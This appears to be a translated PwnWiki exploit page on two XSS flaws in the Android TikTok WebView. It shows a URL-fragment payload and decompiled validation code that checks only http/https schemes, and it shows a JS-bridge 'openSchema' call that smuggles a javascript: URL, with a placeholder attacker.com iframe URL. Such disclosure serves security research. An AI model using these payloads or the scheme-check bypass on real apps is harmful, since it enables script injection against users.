Android TikTok XSS Vulnerability

From PwnWiki
This page is a translated version of the page 安卓版TikTok XSS漏洞 and the translation is 100% complete.
Other languages:

Generic XSS on TikTok WebView

https://m.tiktok.com/falcon/#'),alert(1));//

The following execution will be triggered:

JSON.stringify(window.performance.getEntriesByName('https://m.tiktok.com/falcon/#'),alert(1));//'))

Add Wiki Activity的另一個XSS

Add Wiki Activity implements URL verification to ensure that URLs in the blacklist will not be opened in it. But the verification is only carried out in the http or https scheme. Because they believe that other programs are invalid and do not need to be verified.

if(!e.b(arg8)) {

   com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
   return false;

}public static boolean b(String arg1) {

   return !TextUtils.isEmpty(arg1) && ((arg1.startsWith("http")) || (arg1.startsWith("https"))) && !e.a(arg1);

}

Even if the verification is not based on the javascript solution, this solution can also be used to perform XSS attacks on the WebView.

window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript://m.tiktok.com/%250adocument.write(%22%3Ch1%3EPoC%3C%2Fh1%3E%22)&disable_app_link=false"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
}));